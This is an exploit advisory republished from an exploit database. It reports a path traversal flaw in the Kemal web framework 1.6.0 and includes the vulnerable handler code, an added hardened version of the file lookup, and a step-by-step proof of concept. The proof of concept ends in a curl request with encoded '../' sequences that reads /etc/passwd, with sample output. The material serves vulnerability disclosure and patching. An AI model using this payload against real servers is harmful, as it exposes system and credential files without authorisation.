## https://sploitus.com/exploit?id=PACKETSTORM:190294
Exploit Title: Kemal Framework 1.6.0 - Path Traversal
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 04.04.2025
Vendor Homepage: https://github.com/kemalcr
Software Link: https://github.com/kemalcr/kemal/archive/refs/tags/v1.6.0.zip
Tested Version: v1.6.0 (latest)
Tested on: Kali Linux
CVE: (Waiting for response)
Summary
PoC repository: https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC
A *Path Traversal vulnerability* exists in the Kemal::StaticFileHandler
class of *Kemal Framework v1.6.0*. When serving static files from a
user-defined public directory, the framework fails to sanitize malicious ../
sequences in user-supplied URIs. This allows unauthenticated attackers to
access arbitrary files on the server.
Affected Version
- Kemal Framework v1.6.0
Vulnerable Code
In src/kemal/static_file_handler.cr:
request_path = URI.decode(original_path)
file_path = File.join(@public_dir, request_path)
if File.exists?(file_path)
  send_file(context, file_path)
end
No checks are performed to sanitize or reject traversal sequences (../),
making it possible to access files outside the @public_dir.
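A hardened version of that lookup, added here as an example and not Kemal's own fix; the helper name safe_static_path is assumed, and the constructed inputs at the bottom mirror the PoC request and an ordinary asset path:

```crystal
require "uri"

# Added example, not Kemal's patch. Resolves a request path against the
# public directory and returns nil for anything that would escape it.
def safe_static_path(public_dir : String, original_path : String) : String?
  # Decode once, as the handler does, so "%2f" and "%2e%2e" become real characters.
  request_path = URI.decode(original_path)
  # Work on absolute, normalized paths: expand_path collapses "." and ".."
  # segments, so a traversal sequence cannot survive into the comparison below.
  public_root = File.expand_path(public_dir)
  candidate = File.expand_path(File.join(public_root, request_path))
  # Accept the root itself or any path strictly under it. Comparing with the
  # trailing separator stops "/srv/public_old" from matching "/srv/public".
  inside = candidate == public_root ||
           candidate.starts_with?(public_root + File::SEPARATOR)
  inside ? candidate : nil
end

# Constructed inputs: the encoded traversal from the PoC and a normal asset.
traversal = "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
asset = "/css/app.css"
puts safe_static_path("./public", traversal).inspect # the PoC request
puts safe_static_path("./public", asset).inspect     # an ordinary asset path
```

File.expand_path is purely lexical, so if the public directory can contain symlinks, resolve the candidate with File.realpath before the comparison.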
Proof-of-Concept (PoC)
1. Create a New Kemal Project
mkdir kemal-test
cd kemal-test
crystal init app .
This command creates a sample Crystal application that includes a shard.yml
file.
------------------------------
2. Edit shard.yml File
Edit the shard.yml file as follows:
name: kemal-test
version: 0.1.0

dependencies:
  kemal:
    github: kemalcr/kemal
------------------------------
3. Install the Required Packages
shards install
This command downloads and installs Kemal into the lib/ directory.
------------------------------
4. Edit src/kemal-test.cr File
Write the following content:
require "kemal"

get "/" do
  "Hello from Kemal!"
end

Kemal.config.public_folder = "./public"
Kemal.run
------------------------------
5. Create public/ directory
mkdir public
------------------------------
6. Start the Application
crystal run src/kemal-test.cr
Go to the following address in your browser:
http://localhost:3000
If you see "Hello from Kemal!", everything is working perfectly.
------------------------------
7. Test the Vulnerability
curl "http://localhost:3000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
If successful, the contents of /etc/passwd will be returned as shown below:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...